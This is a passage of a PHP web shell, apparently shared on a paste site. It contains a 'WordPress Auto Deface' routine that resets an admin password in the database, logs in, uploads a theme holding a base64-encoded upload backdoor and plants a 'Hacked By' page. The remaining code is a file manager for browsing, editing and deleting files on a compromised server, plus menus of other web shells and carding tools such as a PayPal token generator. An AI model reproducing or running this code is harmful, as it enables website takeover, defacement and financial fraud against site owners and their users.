  3967. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3968. if(!$conn OR !$db OR !$update) {
  3969. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3970. mysql_close($conn);
  3971. } else {
  3972. $site = "$target/wp-login.php";
  3973. $site2 = "$target/wp-admin/theme-install.php?upload";
  3974. $b1 = anucurl($site2);
  3975. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3976. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3977. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3978. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3979. $www = "m.php";
  3980. $fp5 = fopen($www,"w");
  3981. fputs($fp5,$upload3);
  3982. $post2 = array(
  3983. "_wpnonce" => "$anu2",
  3984. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3985. "themezip" => "@$www",
  3986. "install-theme-submit" => "Install Now",
  3987. );
  3988. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3989. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3990. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3991. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3992. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3993. curl_setopt($ch, CURLOPT_POST, 1);
  3994. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3995. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3996. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3997. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3998. $data3 = curl_exec($ch);
  3999. curl_close($ch);
  4000. $y = date("Y");
  4001. $m = date("m");
  4002. $namafile = "id.php";
  4003. $fpi = fopen($namafile,"w");
  4004. fputs($fpi,$script);
  4005. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4006. curl_setopt($ch6, CURLOPT_POST, true);
  4007. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4008. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4009. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4010. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4011. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  4012. $postResult = curl_exec($ch6);
  4013. curl_close($ch6);
  4014. $as = "$target/k.php";
  4015. $bs = anucurl($as);
  4016. if(preg_match("#$script#is", $bs)) {
  4017. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4018. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4019. } else {
  4020. echo "[-] <font color='red'>gagal mepes...</font><br>";
  4021. echo "[!!] coba aja manual: <br>";
  4022. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4023. echo "[+] username: <font color=lime>$user</font><br>";
  4024. echo "[+] password: <font color=lime>$pass</font><br><br>";
  4025. }
  4026. mysql_close($conn);
  4027. }
  4028. }
  4029. } else {
  4030. echo "<center><h1>WordPress Auto Deface V.2</h1>
  4031. <form method='post'>
  4032. Link Config: <br>
  4033. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  4034. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  4035. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4036. </form></center>";
  4037. }
  4038. } elseif($_GET['act'] == 'newfile') {
  4039. if($_POST['new_save_file']) {
  4040. $newfile = htmlspecialchars($_POST['newfile']);
  4041. $fopen = fopen($newfile, "a+");
  4042. if($fopen) {
  4043. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4044. } else {
  4045. $act = "<font color=red>permission denied</font>";
  4046. }
  4047. }
  4048. echo $act;
  4049. echo "<form method='post'>
  4050. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  4051. <input type='submit' name='new_save_file' value='Submit'>
  4052. </form>";
  4053. } elseif($_GET['act'] == 'newfolder') {
  4054. if($_POST['new_save_folder']) {
  4055. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4056. if(!mkdir($new_folder)) {
  4057. $act = "<font color=red>permission denied</font>";
  4058. } else {
  4059. $act = "<script>window.location='?dir=".$dir."';</script>";
  4060. }
  4061. }
  4062. echo $act;
  4063. echo "<form method='post'>
  4064. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  4065. <input type='submit' name='new_save_folder' value='Submit'>
  4066. </form>";
  4067. } elseif($_GET['act'] == 'rename_dir') {
  4068. if($_POST['dir_rename']) {
  4069. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  4070. if($dir_rename) {
  4071. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4072. } else {
  4073. $act = "<font color=red>permission denied</font>";
  4074. }
  4075. echo "".$act."<br>";
  4076. }
  4077. echo "<form method='post'>
  4078. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4079. <input type='submit' name='dir_rename' value='rename'>
  4080. </form>";
  4081. } elseif($_GET['act'] == 'delete_dir') {
  4082. function Delete($path)
  4083. {
  4084. if (is_dir($path) === true)
  4085. {
  4086. $files = array_diff(scandir($path), array('.', '..'));
  4087. foreach ($files as $file)
  4088. {
  4089. Delete(realpath($path) . '/' . $file);
  4090. }
  4091. return rmdir($path);
  4092. }
  4093. else if (is_file($path) === true)
  4094. {
  4095. return unlink($path);
  4096. }
  4097. return false;
  4098. }
  4099. $delete_dir = Delete($dir);
  4100. if($delete_dir) {
  4101. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4102. } else {
  4103. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4104. }
  4105. echo $act;
  4106. } elseif($_GET['act'] == 'view') {
  4107. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4108. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4109. } elseif($_GET['act'] == 'edit') {
  4110. if($_POST['save']) {
  4111. $save = file_put_contents($_GET['file'], $_POST['src']);
  4112. if($save) {
  4113. $act = "<font color=lime>Saved!</font>";
  4114. } else {
  4115. $act = "<font color=red>permission denied</font>";
  4116. }
  4117. echo "".$act."<br>";
  4118. }
  4119. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4120. echo "<form method='post'>
  4121. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4122. <input type='submit' value='Save' name='save' style='width: 500px;'>
  4123. </form>";
  4124. } elseif($_GET['act'] == 'rename') {
  4125. if($_POST['do_rename']) {
  4126. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4127. if($rename) {
  4128. $act = "<script>window.location='?dir=".$dir."';</script>";
  4129. } else {
  4130. $act = "<font color=red>permission denied</font>";
  4131. }
  4132. echo "".$act."<br>";
  4133. }
  4134. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4135. echo "<form method='post'>
  4136. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4137. <input type='submit' name='do_rename' value='rename'>
  4138. </form>";
  4139. } elseif($_GET['act'] == 'delete') {
  4140. $delete = unlink($_GET['file']);
  4141. if($delete) {
  4142. $act = "<script>window.location='?dir=".$dir."';</script>";
  4143. } else {
  4144. $act = "<font color=red>permission denied</font>";
  4145. }
  4146. echo $act;
  4147. }else {
  4148. if(is_dir($dir) == true) {
  4149. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4150. <tr>
  4151. <th class="th_home"><center>Name</center></th>
  4152. <th class="th_home"><center>Type</center></th>
  4153. <th class="th_home"><center>Size</center></th>
  4154. <th class="th_home"><center>Last Modified</center></th>
  4155. <th class="th_home"><center>Permission</center></th>
  4156. <th class="th_home"><center>Action</center></th>
  4157. </tr>';
  4158. $scandir = scandir($dir);
  4159. foreach($scandir as $dirx) {
  4160. $dtype = filetype("$dir/$dirx");
  4161. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4162. if(!is_dir("$dir/$dirx")) continue;
  4163. if($dirx === '..') {
  4164. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4165. } elseif($dirx === '.') {
  4166. $href = "<a href='?dir=$dir'>$dirx</a>";
  4167. } else {
  4168. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4169. }
  4170. if($dirx === '.' || $dirx === '..') {
  4171. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4172. } else {
  4173. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4174. }
  4175. echo "<tr>";
  4176. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4177. echo "<td class='td_home'><center>$dtype</center></td>";
  4178. echo "<td class='td_home'><center>-</center></th>";
  4179. echo "<td class='td_home'><center>$dtime</center></td>";
  4180. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4181. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4182. }
  4183. echo "</tr>";
  4184. foreach($scandir as $file) {
  4185. $ftype = filetype("$dir/$file");
  4186. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4187. $size = filesize("$dir/$file")/1024;
  4188. $size = round($size,3);
  4189. if($size > 1024) {
  4190. $size = round($size/1024,2). 'MB';
  4191. } else {
  4192. $size = $size. 'KB';
  4193. }
  4194. if(!is_file("$dir/$file")) continue;
  4195. echo "<tr>";
  4196. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4197. echo "<td class='td_home'><center>$ftype</center></td>";
  4198. echo "<td class='td_home'><center>$size</center></td>";
  4199. echo "<td class='td_home'><center>$ftime</center></td>";
  4200. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4201. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4202. }
  4203. echo "</tr></table>";
  4204. } else {
  4205. echo "<font color=red>can't open directory</font>";
  4206. }
  4207. }
  4208. echo "<center><hr><form>
  4209. <select onchange='if (this.value) window.open(this.value);'>
  4210. <option selected='selected' value=''> Tools Creator </option>
  4211. <option value='$ling=wso'>WSO 2.8.1</option>
  4212. <option value='$ling=injection'>1n73ction v3</option>
  4213. <option value='$ling=wk'>WHMCS Killer</option>
  4214. <option value='$ling=adminer'>Adminer</option>
  4215. <option value='$ling=b374k'>b374k Shell</option>
  4216. <option value='$ling=b374k323'>b374k 3.2</option>
  4217. <option value='$ling=bh'>BlackHat Shell</option>
  4218. <option value='$ling=dhanus'>Dhanush Shell</option>
  4219. <option value='$ling=r57'>R57 Shell</option>
  4220. <option value='$ling=encodedecode'>Encode Decode</option>
  4221. <option value='$ling=r57'>R57 Shell</option>
  4222. </select>
  4223. <select onchange='if (this.value) window.open(this.value);'>
  4224. <option selected='selected' value=''> Tools Carder </option>
  4225. <option value='$ling=extractor'>DB Email Extractor</option>
  4226. <option value='$ling=MailerDelay'>MAILER YA Chonx</option>
  4227. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  4228. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  4229. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  4230. <option value='$ling=mailer'>Mailer</option>
  4231. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4232. </select>
  4233. <noscript><input type='submit' value='Submit'></noscript>
  4234. </form></font></center>";
  4235. ?>
  4236. </html>
Add Comment
Please, Sign In to add comment